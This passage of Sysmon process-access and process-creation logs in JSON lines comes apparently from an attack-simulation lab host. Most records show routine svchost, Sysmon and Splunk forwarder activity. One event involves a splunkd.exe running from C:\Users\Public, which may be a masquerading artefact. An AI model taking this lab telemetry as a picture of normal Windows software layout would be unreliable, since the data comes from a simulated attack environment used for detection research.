06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.099\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-001022EE0500}\r\nTargetProcessId: 3044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.099","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-001022EE0500}","TargetProcessId":"3044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.240\r\nSourceProcessGUID: {E2A3D6B1-110D-5F25-0000-001022EE0500}\r\nSourceProcessId: 3044\r\nSourceThreadId: 3040\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.240","SourceProcessGUID":"{E2A3D6B1-110D-5F25-0000-001022EE0500}","SourceProcessId":"3044","SourceThreadId":"3040","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.427\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.427","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nProcessGuid: {E2A3D6B1-110D-5F25-0000-00105BF00500}\r\nProcessId: 4128\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","ProcessGuid":"{E2A3D6B1-110D-5F25-0000-00105BF00500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-00105BF00500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-00105BF00500}","TargetProcessId":"4128","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program 